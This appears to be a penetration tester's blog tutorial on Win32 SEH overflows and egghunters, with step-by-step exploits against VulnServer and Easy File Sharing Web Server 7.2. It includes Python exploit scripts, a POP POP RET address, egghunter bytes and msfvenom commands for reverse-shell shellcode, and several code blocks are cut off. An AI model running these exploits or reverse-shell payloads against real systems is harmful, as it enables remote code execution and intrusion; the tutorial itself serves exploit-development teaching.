

Penetration Tester

© 2020

Win32 Buffer Overflow - SEH Overflows & Egghunters


I recently wrote a tutorial on Simple Win32 Buffer-Overflows where we exploited one of the most simple Buffer Overflows around; Stack-Overflow aka EIP Overwrite which you can read Here

At the start of the article I discussed how I recently embarked on a mission to learn exploit development better and the purpose of this mini-series was too have reason to put pen to paper and finally learn all this shit :) - Now in this article I want to move on a little bit from basic Stack Overflows and progress to SEH - Structured Exception Handling Overflows.

Now of course it is fairly obvious that the exploits I am talking about here are fairly old, think WinXP days and a lot of this stuff has been mitigated with new technologies such as DEP / ASLR etc, but as I said in Part-1 you have to learn the old stuff before you learn the new stuff.

Let’s jump right into it.

Table of Contents:

Exception Handlers 101

Before we jump into looking at this from a exploitation perspective let’s first talk about what Exception Handlers really are, the different types and what purpose they service within the Windows OS.

What is an Exception?

An exception is an event that occurs during the execution of a program/function

Different Types of Handlers

Exception Handler (EH) - Piece of code that will attempt to do something and have pre-defined courses to take depending on the outcome. For example, try do this if you fail do this.

**Structured Exception Handler (SEH) - ** Windows in-built Exception Handler that can be used to fallback on if your development specific Exception Handler fails or to be used primarily.

**Next Structured Exception Handler (nSEH) - **

Now as you can see above I have mentioned EH/SEH truthfully because Exception Handlers are split up into two different categories, OS Level handlers and/or Handlers implemented by developers themselves. As you can see Windows has an OS Level called SEH.

So basically Exception Handlers are pieces of codes written inside a program, with the sole purpose of dealing any exceptions or errors the application may throw. For example:

    // Code to try goes here.
catch (SomeSpecificException ex)
    // Code to handle the exception goes here.
    // Code to execute after the try (and possibly catch) blocks 
    // goes here.

The above example represents a basic exception handler (EH) in C# implemented by the developer - Sometimes looking at code like above can be quite scary to a non-programmer but all we are really doing is saying try run this piece of code & if an error/exception occurs do whatever the catch block contains. Simple!

Now it is not uncommon for software developers to write there own exception handlers to manage any errors/warnings there software may through but Windows also has one built in called Structured Exception Handler (SEH) which can throw up error messages such as Program.exe has stopped working and needs to close - I’m sure you have all seem them before.

It is also worth mentioning that no matter where the Exception Handler is defined whether it be at the OS-Level and/or Developer Level that all Handlers are controlled and managed centrally and consistently by the Windows SEH via a collection of designated memory locations and functions.

So How Do Structured Exception Handlers Work?

So, How do they work? Well SEH is a mechanism within Windows that makes use of a data structure/layout called a Linked List which contains a sequence of memory locations. When a exception is triggered the OS will retrieve the head of the SEH-Chain and traverse the list and the handler will evaluate the most relevant course of action to either close the program down graceful or perform a specified action to recover from the exception. (More on the linking later)

When we run an application its executed and each respective function that is ran from within the application there is a stack-frame created before finally being popped off after the function returns or finishes executing. Now the same is actually true for Exception Handlers. Basically if you run a function with a Exception Handler embedded in itself- that exception handler will get it’s own dedicated stack-frame

Source: ethicalhacker.net

As you can see each code-block has it’s own stack-frame, represented by the arrows linking each respective frame.

So… How are they linked? Well for every Exception Handler, there is an Exception Registration Record configured which are all chained together to form a linked list. The Exception Registration Record contains numerous fields but namely the _EXCEPTION_REGISTRATION_RECORD *Next; which defines the next Exception Registration Record in the SEH Chain - This is what allows us too navigate the SEH Chain from top-to-bottom.

Now, you might be wondering how Windows SEH uses the Exception Registration Record & Handlers etc. Well when an exception occurs, the OS will start at the top of the SEH Chain and will check the first Exception Registration Record to see if it can handle the exception/error, if it can it will execute the code block defined by the pointer to the Exception Handler - However if it can’t it will move down the SEH Chain utilizing the _EXCEPTION_REGISTRATION_RECORD *Next; field to move to the next record and it will continue to do so all the way down the chain until it finds a record/handler that is able to handle the exception.

But what if none of the pre-defined exception handler functions are applicable? Well windows places a default/generic exception handler at the bottom of every SEH Chain which can provide a generic message like Your program has stopped responding and needs to close - The generic handler is represented in the picture above by 0xffffff

The below image provides a simplified overview of the overall SEH Chain

We can also view the SEH Chain with Immunity by loading our binary and hitting Alt+S - As you can see in the picture below we have the SEH Chain highlighted in green in the bottom left as well as the SEH Record / SEH Handler highlighted in blue on the stack.

In this case we actually have 2 Handlers specified by SEH Records - The first is a normal implemented handler and the 2nd one at address 0028FFC4 is Window’s OS Level handler which we can see in the screenshot below.

The Vulnerability

So to just recap, we have covered what exceptions are, the different types of handlers and we have also spoken about how Structured Exception Handlers really work, so now we should probably talk about this from an attackers point of view and how we can exploit these handlers to gain control over a programs execution flow similar to the EIP Overwrite in Part 1.

Now in Part 1 Here - We were able to control the execution flow over VulnServer & SLMail to redirect it too our own shellcode and pop a reverse shell, now of course this was a really old vulnerability and SEH was supposed to resolve this but it was a really poor implementation and soon exploited itself.

Now I don’t want to show off a crazy example here as I will cover it in the Examples section below, but the theory here is we do not overwrite EIP with user control input but instead overwrite the pointer to next SEH record aka Exception Registration Record as well as the pointer to the SE Handler to an area in memory which we control and can place our shellcode on.

As you can see here we have not overwritten the EIP Register with 41414141 similar to Part1 but instead overwritten the pointers to SE Handler and SEH Record. Now before we jump to talking about Egghunters and how they can be of use when doing SEH Overflows - I quickly want to show you how we can control the EIP Register compared to the pointers to SE Handler and SEH Record.

I won’t go into deep specifics but this if we can fuzz a never-repeating string and then calculate the offset that we overwrite the SE Handler & SE Record with data of our choice which could be used to control EIP.

With the below example I analyzed that the offset too SE Record was 3519 Bytes therefore I added 4 x B’s over SE Record and 4 x C’s over SE Handler. Check out the script below.

import socket
import sys

nseh = "BBBB" 
seh = "CCCC"

buffer="A" * 3515
buffer += nseh
buffer += seh

junk = "D"*(4500-len(buffer))
buffer += junk

	print "[*] Starting to Fuzz GMON"
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	print "[*] Connected to bof.local on Port 9999"
	s.send(('GMON /.:/' + buffer))
	print "[*] Finished Fuzzing Check SEH Chain on Immunity"
	print "couldn't connect to server"

Now if we jump over Immunity and check out the SEH Chain we will see the below.

Let me first show you something, at the current moment the application is in a crashed state (of course) but we can still pass the exception to program by pressing Shift+F9 - If we do this we can notice something interesting.

The value of SE Handler on the stack is pushed to the EIP Register which of course is not ideal! We can now control the execution flow of the overall program.

A Mention on POP POP RET

So as you can see in the above screenshots/examples we are effectively living in the land or area of the SE Handler which is not really good due to the limitations with space and how small of an area of memory we have to work with, of course we may be able to bring Egghunters into the mix but I will talk about that later in this article. I want to first talk about the POP POP RET technique which is commonly coupled with SEH Overflows.

What is POP POP RET?

Now really the POP POP RET is really how it sounds we replace the SE Handler value with the memory address of a POP POP RET instruction, this will technically run these assembly instructions which will lead us to the nSEH.

It’s worthwhile mentioning that the registers to which the popped values go to are not important, we simply just need to move the value of ESP higher twice and then a return to be executed. Therefore either POP EAX, POP EBC, POP ECX etc will all be applicable providing there is a relevant RET instruction after the 2 pops

Why Do we POP POP RET?

Now if you think back to Part 1 - Once we had gained control over our return address and EIP we located a JMP ESP instruction to jump to the top of our stack frame where our shell code and NOPs were sliding and we gained code execution. Now if we try to add a memory location of a JMP ESP instruction to the SE Handler, windows will automatically zero-out all registers to prevent users from jumping to there shellcode but this is a really flawed protection mechanism.

You can actually see in the below screen that ESI & EDI have been zeroed out to help mitigate an attacker jumping straight to shellcode.

Now this is where POP POP RET comes into play, Let’s first just remember about the layout of the SEH Record & Handler on the stack

Now let’s think about what POP POP RET would do here, POP (move up 4 bytes), POP (move up 4 bytes) & RET (simple return, send address to EIP as next instruction to execute) - Now we have full control ;)

Finding POP POP RET Modules & Instructions

Now I do not want to go into depth here with how we find applicable modules and instructions as I will cover it in the examples section but the long story short is mona

Similar to Part 1 where we used mona intensively it will also be of use when carrying out SEH Overflows - All we have to do is issue the below command

!mona seh

This will automatically search all available modules for a POP POP RET sequence.

Now just like exploit we have to ensure that we choose a module with 0 bad chars in the memory address as well as avoid and SEH Safeguards such as SafeSEH, which I will talk about a later.

Egghunters 101

What is an Egghunter?

An Egghunter is a small piece of shellcode, typically 32 Bytes that can be used to search all memory space for our final-stage shellcode

So How Do Egghunters Work?


I would like to provide a high level overview of how Egghunters work here without going crazy in depth, as I have already said above

An Egghunter is a small piece of shellcode, typically 32 Bytes that can be used to search all memory space for our final-stage shellcode

This sounds great but why not just jump to our shellcode with a simple Short JMP or JMP ESP - Well imagine you have very little space to work with, let’s say for example 50 bytes. This is nowhere near enough space to place some shell code but it is enough to place a 32 Byte Egghunter

Providing we can get our 32 Byte hunter onto the stack/memory and we are able to redirect execution to the location of the hunter we can tell the hunter to search the whole memory space for a pre-defined tag such as MOCH and our shellcode would be placed directly after this tag aka the egg

So execution flow would look something like this

  1. Gain Control over Execution
  2. Jump to Small Buffer Space containing 32 Byte Egghunter
  3. Egghunter executes and searches all of memory for a pre-defined egg
  4. Egghunter finds egg & executes shellcode placed after egg

A Word on NTDisplayString

In this article we will be using the 32 Byte Egghunter which makes use of the NTDisplayString system call which is displayed as



  IN PUNICODE_STRING      String );


NTDisplayString is actually the same system-call used too display blue-screens within Windows, So how does this come into play with our Egghunter?

Well we abuse the fact that this system call is used to validate an address range & the pointer is read from and not written too.

There is a small downside to this method, the system call number for NTDisplayString can’t change and across the years system call numbers have changed across versions of Windows as well as architecture.

When I was writing this article I actually ran into some issues with my Egghunter showing Access Violation reading: FFFFFF when executing INT 2E aka a system call. The reason?

Because I was trying to run the Egghunter on a 64bit arch of Windows, kind of stupid of me but I did not give it much thought due to the application being compiled as a 32bit application and not having much issues in the past.

Corelan did a great job explaining what each assembly instruction of an Egghunter does so please check out there article Here


VulnServer w/ Egghunter

In this example I am going to go over VulnServer which is an intentionally vulnerable server that listens on port 9999 for any incoming connections and supports numerous types of commands as previously saw in Part 1.

Fuzzing & Finding the Crash

Now similar to Part 1 I do not want to demonstrate fuzzing every single available command on VulnServer If you’re looking for something like that check our booFuzz it’s pretty cool. In this case I am only going to fuzz the GMON command to save time and to focus on the exploitation part itself.

Let’s kick it off with a simple fuzz of this command with the below script.

import socket
import sys


while len(buffer) <= 30:

for string in buffer:
	print "[*] Starting to Fuzz GMON with %s bytes" %len(string)
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	print "[*] Connected to bof.local on Port 9999"
	s.send(('GMON /.:/' + string))
print "[*] Finished Fuzzing GMON with %s bytes" %len(string)

What we are doing here is very similar to the basic stack-overflow we covered in Part 1, in which we are doing the following

  1. Connect to bof.local on Port 9999
  2. Send GMON /.:/ + string += 200 - Where string = A and increments by 200 each cycle.
  3. Close TCP Connection

Once the application has crashed the script will seize running and we can check out Immunity.

Now when we jump over to Immunity we may notice some interesting stuff, the first thing I notice is Access Violation when writing to [06500000] along the footer of Immunity, this is telling us that the application is in a crashed state and really does not know what to do next - You may also notice that the EIP value is looking normal unlike Part 1 where it contained 41414141 - This is due to the fact we have not over run the return address and gained control over the EIP Register but instead overrun the nSEH and SEH values on the stack.

Let’s bring up the SEH Chain by pressing ALT+S within Immunity. Upon doing so we will notice something interesting the 41414141 output we are used to seeing in the EIP Register is now showing in SE Handler. Right click 41414141 and select Follow in Stack

Perfect, we are now able to override the pointer to nSEH & SEH with user-supplied input. Let’s now find out how much user-supplied input has to be provided in order to get to the pointer of nSEH and SEH

Finding the Offset

Here we are again, finding the offset as I am sure you are aware this is a very common piece of exploit development and does not just apply to SEH Overlows - There are a couple different ways to do this such as manually, metasploit and mona but I will stick to mona here due to preference.

Let’s first create a never-repeating string / cyclic pattern with the below command

!mona pc 6000

And couple this with our fuzzing script but instead of repeating A’s incrementing by 200 bytes each time let’s simply just send our pattern alongside GMON :./

import socket
import sys

buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa...."

print "[*] Starting to Fuzz GMON with pattern containing %s bytes" %len(buffer)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Connected to bof.local on Port 9999"
s.send(('GMON /.:/' + buffer))
print "[*] Finished Fuzzing GMON with %s bytes" %len(buffer)

Our application will now return to a crashed state and report a Access Violation but this time SE Handler contains 45336E45 in comparison to 41414141 - Let’s jump to the stack again and check out data residing on the stack at present.

Perfect! As you can see we are looking at our never-repeating string and can not calculate the offset by simply using one of the below commands within mona

!mona findmsp
!mona po 1En2

As you can see it took us 3515 bytes to overrun the value of nSEH and 3519 bytes to overrun the value of SE Handler - Before I jump into beginning to piece everything together I want to first take this time to find any bad chars.

Finding Bad Chars

I will not go into any explanation here to why we need to find bad chars as I did a pretty good job talking about it in Part 1 so head over there.

Let’s use the simple script below to send a string of every single possible character through to VulnServer via the GMON command. Of course we will exclude the \x00 character aka the null-byte.

import socket
import sys

nseh = "B"*4
seh = "C"*4

badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"

buffer = "A" * (3515-len(badchars))
print "[*] There are %s" %len(badchars) + " bad chars to test"
print "[*] Starting to Fuzz GMON with %s bytes" %len(buffer) + " A's"
buffer += badchars #All of badchars
buffer += nseh #BBBB
buffer += seh #CCCC
junk = "D"*(5000-len(buffer))
buffer += junk #Bunch of D"s to fill remaining space

print "[*] Starting to Fuzz GMON with everything containing %s bytes" %len(buffer)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Connected to bof.local on Port 9999"
s.send(('GMON /.:/' + buffer))
print "[*] Finished Fuzzing GMON with %s bytes" %len(buffer)

Now, just to give a brief overview of what we do here

  1. Calculate the amount of bad chars and minus that value from 3515 aka our offset
  2. Send 3260 A's + 255 bad chars
  3. Send BBBB to overwrite the nSEH value
  4. Send CCCC to overwrite the SEH value
  5. Fill remaining space with DDDD...
    1. The reason we do this is we don’t fill the remaining space then the SEH won’t trigger

Ps: Due to the limited size of space after the SE Handler aka 52 bytes I decided to send the bad characters before overwriting nSEH and SEH

Checking the memory dump we can see that we actually have zero bad chars besides the null-byte aka \x00

Finding POP POP RET Instruction

I have already talked in detail about the POP POP RET sequence of instructions and why it’s important so I will stick to practical and let the section above A Mention on POP POP RET do the talking.

Let’s first find an applicable module which will contain this sequence of instructions using the below command with mona

!mona seh

Here an obvious choice stands out efffunc.dll as it is not compiled with any security mechanisms such as SafeSEH or ASLR

Let’s double click the module and just verify the assembly instructions and make sure this is what we need.

Perfect, we have a POP EBX POP EBP and RETN instruction. This is exactly what we need POP POP RET

For this part, I recommened you place a breakpoint at the start of your POP POP RET function so you can step-through the next part to understand what happens, you can this by simply double-clicking your selected module in mona followed by pressing F2 on the POP EBX instruction.

Now I will amend my python script to overwrite the seh variable with the value of my POP POP RET instruction just like below.

import socket
import sys

nseh = "B"*4
seh = "\xb4\x10\x50\x62" #0x625010b4 pop,pop,ret

buffer = "A" * 3515
print "[*] Starting to Fuzz GMON with %s bytes" %len(buffer) + " A's"
buffer += nseh #BBBB
buffer += seh #CCCC
junk = "D"*(5000-len(buffer))
buffer += junk #Bunch of D"s to fill remaining space

print "[*] Starting to Fuzz GMON with everything containing %s bytes" %len(buffer)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Connected to bof.local on Port 9999"
s.send(('GMON /.:/' + buffer))
print "[*] Finished Fuzzing GMON with %s bytes" %len(buffer)

Let’s run this script and jump over to Immunity again and see what has happened.

Before we check out the stack or memory dump let’s quickly check the SEH Chain

Perfect, the SE Handler is pointing to our POP POP RET instruction from our selected DLL, this case 0x625010B4 -> essfunc.dll

A quick analysis of the stack and memory dump also all looks okay.

Of course as we are merely piecing everything together at the moment the application is in a crashed state, however let’s send our pass our exception to the program with Shift+F9 which send the value of SE Handler on the stack to the EIP Register which in turn will jump to our POP POP RET instruction.

<img src = "https://i.imgur.com/n888gkn.png".

Perfect! Exactly what we needed, our SE Handler value of 625010B4 in pushed to EIP which in turn is our POP POP RET instructions as shown at the top left.

Now if we step through by pressing F7 we will first POP EBX POP EBP and finally RETN which will take us to the value of nSEH - In this case BBBB

Just to explain in a little more detail what happens here

  • POP EBX - POP’s top of stack into EBX Register - 7DEB6AB9
  • POP EBP - POP’s top of stack into EBP Register - 0237ED34
  • RETN - Returns / pushes value at the top of the stack into EIP Register - 0237FFC4

Now you may notice that 0237FFC4 looks familiar, if we check out SEH Chain again we will see that 0237FFC4 corresponds to nSEH

As you can see EIP points too 024FFFC4 which relates to the instruction at the top left, looking at said instructions we can see ` 42 42 42 42 which represents our “B”*4`

Generating Egghunter

As I have already talked about why we use Egghunters and how they work I will jump straight into it, first let’s analyze the stack and what are working with here.

As previously mentioned it takes 3515 Bytes to get too nSEH and 3519 Bytes to overwrite the pointer to SE handler and afterwards we have 52 Bytes of space, in this case represented by DDDDD... - Of course 52 bytes is not enough space for our shellcode but it is enough for a Egghunter as we only require 32 Bytes - Providing we can get our shellcode onto memory via other means with the relevant Egghunter tag we should be able to execute just fine.

As per usual I will be using mona to assist me with this stage due to simplicity.

Generating Egghunter with Mona

!mona egg -t MOCH

By default mona will generate an Egghunter with the default tag of w00t which will work perfectly fine but here I have chose to specify a custom tag of MOCH

Perfect, now let’s add this to our exploit script

egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"

It’s worth noting that Egghunters should be checked for previously discovered bad characters also.

We will also define our tag inside a variable TWICE so that the Egghunter does not find itself when executing and searching memory.

egg = 'MOCHMOCH'

I will also take this time to replace the junk variable with

buffer += egghunter
junk = "D"*(5000-len(buffer))
buffer += junk #Bunch of D"s to fill remaining space

This will allow us to add the Egghunter shell code straight after SEH followed by a bunch of D’s to fill the remaining space just to be careful.

Let’s now generate some shell code, make some last adjustments to the overall exploit and give it a try.

Jumping to Egghunter

Now just to reiterate what are aiming to do here is over run SEH, perform a POP POP RET sequence which in turns pushes the value of nSEH into the EIP Register - In this case we would like to either place the address of our Egghunter over nSEH or some form of instructions that will jump us down into our Egghunter shellcode, once again if we check out the stack we can see we don’t have far too travel.

Generating Shellcode & Final Exploit

As always I will be using MSFVenom here to generate some shellcode as we are not really fighting against advanced anti-virus or anything so no need to be fancy, let’s just simply use the below code.

m0chan@kali:/> msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f c -a x86 --platform windows -b "\x00"

Great shell code is now generated we simply just pop this into our final exploit.

In this case you can see we will jump from memory address 0237FFC4 down to 0237FFCC which will be where our Egghunter will sit.

Now here we would just overwrite the address of nSEH with 0237FFCC but like I said it’s not very practical, and it is better practice to just do a simple short jump aka opcode EB - However there is a small twist. the EB instruction is only 2 Bytes and nSEH expects 4 Bytes.

This isn’t a huge problem as we can simple just use NOPS aka \x90 so what we will do here is fill nSEH with \x90\x90 which means 2/4 bytes are full followed by our EB instruction \xeb\x06 which stands for jump 6 bytes. Now 4/4 bytes are filled within nSEH

Our exploit will now technically jump 8 Bytes but we only need to jump 6 Bytes as we are really just sliding down the NOPS so 6 bytes is all that’s required.

Great so now update our nSEH variable in our exploit to reflect the below

nseh = "\xeb\x06\x90\x90"

Of course little endian is the reason once again for the reverse order.

Final Exploit

import socket
import sys

#Vulnserver GMON SEH Overflow w/ Egghunter
#Author: m0chan
#Date: 28/08/2019

nseh = "\xeb\x06\x90\x90" #0x909006be - nop,nop,jump 6 bytes with EB into egghunter
seh = "\xb4\x10\x50\x62" #0x625010br pop,pop,ret

eggnops = "\x90\x90\x90\x90\x90\x90\x90\x90"

egghunter = (

egg = 'MOCHMOCH'

#msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -e x86/shikata_ga_nai EXITFUNC=thread -f c -a x86 --platform windows -b "\x00\x80\x0a\x0c\x0d"

shellcode = (

buffer = "A" * (3515-len(egg + shellcode))
print "[*] Adding Egghunter tag " + egg + " alongside A Buffer"
buffer += egg
buffer += shellcode
print "[*] Starting to Fuzz GMON with %s bytes" %len(buffer) + " A's"
buffer += nseh
print "[*] Overwriting nSEH Value with " + nseh
buffer += seh #0x625010br pop,pop,ret
print "[*] Overwriting SEH Value with " + seh
buffer += eggnops
buffer += egghunter
junk = "J"*(5000-len(buffer))
buffer += junk #Bunch of D"s to fill remaining space

print "[*] Starting to Fuzz GMON with everything containing %s bytes" %len(buffer)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Connected to bof.local on Port 9999"
s.send(('GMON /.:/' + buffer))
print "[*] Finished Fuzzing GMON with %s bytes" %len(buffer)

Providing we have a listener open on 443 we will receive a reverse shell back - It’s worth noting here that this will ONLY work on Windows 7 x86 this is due to the way the Egghunter initiates system calls, namely INT 2E - It is slightly different across architecture so our mona Egghunter will only work on 32 Bit

I decided to create this little diagram to represent the exploit from a high level and try to show each relevant jump - My visio skills aren’t that great so excuse me!

Easy File Sharing Web Server 7.2 w/o Egghunter

Easy File Sharing Web Server is a legacy piece of software from Win XP / Win 7 era which allowed visitors to upload/download files easily through a web browser of there choosing, despite it’s usefulness at the time it was littered with numerous vulnerabilities from Stack Overflows to SEH Overflows.

Fuzzing & Finding the Crash

Similar to previous examples I am going to stick the fuzzing stage as I do not want to spend lots of time fuzzing each input/parameter, that being said in this example we will be targeting the HTTP protocol and boozfuzz supports HTTP fuzzing, so check that out! I will be making a sole article soon purely on fuzzing and different techniques.

As the vulnerability lies within HTTP there are a couple ways to do this with python,we could use the requests library or we can just connect over Port 80 and send raw HTTP requests. - I will go for the Port 80 / Raw Requests here and maybe rewrite the script with requests at the end.

Let’s first start off with a basic FUZZ script incrementing in size until we get a crash, here the vulnerability lies within the GET variable in which the underlying application tries to fetch the input passed alongside GET and fails to carry our bounds checking and any sanitization etc.

This is an example HTTP request which we will send with python

GET /m0chan.txtAAAAAAAAAbufferhereAAAAAAA HTTP/1.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SESSIONID=5905; UserID=; PassWD=
If-Modified-Since: Fri, 11 May 2012 10:11:48 GMT
Connection: close

As you can see on Line 1 we are requesting m0chan.txt alongside what will be our buffer/pattern. - Let’s quickly write a little python script to make this a little simpler.

import socket
import sys
import string

buffer = "A" * 5000

payload = "GET %d" + str(buffer) + " HTTP/1.1\r\n"
payload += "Host: bof.local\r\n"
payload += "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36\r\n"
payload += "Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8"

print "[*] Starting to Fuzz GET Variable with %s bytes" %len(payload)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Connected to bof.local on Port 80"
print "[*] Finished Fuzzing GET Variable with %s bytes" %len(payload)

Once this has finished running providing we have EFSWS open in Immunity and/or attached we will notice that we have in fact caused a crash, let’s analyze the screenshot below and see what we have done.

As you can see we have overrun the address of nSEH and SEH both with user supplied input, in this case AAAA 41414141 - We have also over run something new to us as well… the EAX Register - As you can see top right EAX contains 41414141 which is our A buffer. - This may come in useful later.

Finding the Offset

As we have now analyzed the crash and found the vulnerability we can proceed to calculate the offset and work out how many A's it takes for us to over run the SEH and nSEH pointer. I will use mona for this with the below command to calculate a non-repeating string aka cyclic pattern.

!mona pc 5000

I will now use my fuzzer.py script again and amend it to send my pattern instead 5000 A's

import socket
import sys
import string

buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6...."

payload = "GET %d" + str(buffer) + " HTTP/1.1\r\n"
payload += "Host: bof.local\r\n"
payload += "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36\r\n"
payload += "Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8"

print "[*] Starting to Fuzz GET Variable with %s bytes" %len(payload)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Connected to bof.local on Port 80"
print "[*] Finished Fuzzing GET Variable with %s bytes" %len(payload)

Our application will now return to a crashed state and report a Access Violation but if we check SEH Chain and jump to the value of SE Handler on the stack we will notice that it is in fact overrun with our cycling pattern and not a long string of A's

!mona findmsp
!mona po 3Ff4

Running either of the above commands will report that the offset to over run the nSEH value is 4061 Bytes - We can now amend our exploit to reflect "A" * 4061

Finding Bad Chars

Here we will employ the same methods as above, in which we will send every possible character alongside our buffer and analyze how they display in the memory dump - It’s also worth noting here that we will have to exclude the chars for \n & \r as we do not want to send carridge returns and new lines alongside our buffer effectively breaking up the raw HTTP request.

I will use the below script here.

import socket
import sys

nseh = "B"*4
seh = "C"*4

badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"

buffer = "A" * (4061-len(badchars))
print "[*] There are %s" %len(badchars) + " bad chars to test"
print "[*] Starting to GET Variable"
buffer += badchars #All of badchars
buffer += nseh #BBBB
buffer += seh #CCCC
junk = "D"*(5000-len(buffer))
buffer += junk #Bunch of D"s to fill remaining space

payload = "GET %d" + str(buffer) + " HTTP/1.1\r\n"
payload += "Host: bof.local\r\n"
payload += "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36\r\n"
payload += "Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8"

print "[*] Starting to Fuzz GET Variable with %s bytes" %len(payload)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Connected to bof.local on Port 80"
print "[*] Finished Fuzzing GET Variable with %s bytes" %len(payload)

Providing we rinse-repeat this and find all the dead characters in memory dump we will find what we need, in this case my findings were


Finding POP POP RET Instruction

As I have already covered this extensively throughout this article I will jump straight into the action and find a module that contains a pop pop ret instruction.

Of course once again we will use mona to accomplish this with the handy command below

!mona seh

Of course here the goal is to find a module that was not compiled with any security restrictions such as ASLR, Safe SEH etc.

You will notice that when running !mona seh it displays 10 results in the log window and none of them are really suitable and it’s easy to get confused here and start wondering if there is even a module to use. However! If you check the seh.txt file located in the working directory of mona you will find a very large .txt file that contains hundreds, maybe even thousands of usable modules.

In my case I scrolled past all the modules starting with 00 to avoid inadvertently implementing a rogue null-byte in my buffer.

My chosen option was 0x1000108b

I now added this value to my SEH variable in my python script and executed it to verify that my thinking was right and execution was flowing as expected.

Updated Python Script

import socket
import sys

nseh = "B"*4
seh = "\x99\xab\x01\x10" #0x1001ab99 pop pop ret

buffer = "A" * 4061
print "[*] Starting to GET Variable"
buffer += nseh #BBBB
buffer += seh #pop pop ret
junk = "D"*(10000-len(buffer))
buffer += junk #Bunch of D"s to fill remaining space

payload = "GET %d" + str(buffer) + " HTTP/1.1\r\n"
payload += "Host: bof.local\r\n"
payload += "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36\r\n"
payload += "Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8"

print "[*] Starting to Fuzz GET Variable with %s bytes" %len(payload)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Connected to bof.local on Port 80"
print "[*] Finished Fuzzing GET Variable with %s bytes" %len(payload)

Checking Immunity after execution displays that SEH Handler is now overwritten with the memory address of our pop pop ret gadget aka 1001ab99

And if we not pass the exception to the program with Shift+F9 we will pop pop ret and the value of nSEH will be placed in the EIP Register ready for execution. Bingo!

In this case 053A6FAC is the address of nSEH on the stack, so whatever we place in this location will be executed. As show in the below screenshot.

Generating Shellcode

Now unlike VulnServer where we had very limited space to work with AFTER the buffer - 52 Bytes to be precise in our case here we have a lot of room after our nSEH & SEH values, 931 Bytes to be precise.

Now providing we encode our shell code a little bit we should be able to just put our shellcode here and jump straight into this with a little Short JMP in our nSEH pointer.

But, first let’s generate some shellcode using trusty MSFVenom

m0chan@kali:/> msfvenom -p windows/shell/reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f c -a x86 --platform windows -b "\x00\x0d\x0a\x0c"

You may noticed I have went for a staged payload this time in comparison to a stageless just to help lower the payload size a little more.

Final Exploit

Jumping to shell code and executing the final shellcode. All this is left to do now is place our shell code inside our D buffer alongside some NOPS for safety and execute a 6 Byte jump from nSEH which will land in our NOP Sled and straight into shellcode.

We can do this with

nseh = "\xeb\x06\x90\x90"

Our final exploit will now look something like this

import socket
import sys

nseh = "\xeb\x06\x90\x90"
seh = "\x99\xab\x01\x10" #0x1001ab99 pop pop ret

#msfvenom -p windows/shell/reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f c -a x86 --platform windows -b "\x00\x0d\x0a\x0c\x20\x25\x2b\x2f\x5c"

shellcodenops = "\x90\x90\x90\x90"

shellcode = (

buffer = "A" * 4061
print "[*] Starting to GET Variable"
buffer += nseh #BBBB
buffer += seh #pop pop ret
buffer += shellcodenops
buffer += shellcode
junk = "D"*(10000-len(buffer))
buffer += junk #Bunch of D"s to fill remaining space

payload = "GET %d" + str(buffer) + " HTTP/1.1\r\n"
payload += "Host: bof.local\r\n"
payload += "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36\r\n"
payload += "Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8"

print "[*] Starting to Fuzz GET Variable with %s bytes" %len(payload)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Connected to bof.local on Port 80"
print "[*] Finished Fuzzing GET Variable with %s bytes" %len(payload)

Similar to VulnServer - I also created a nice little diagram in Visio to demonstrate the exploit and jumps from a high level.

References / Resources

Special Shoutout to all the People Below:





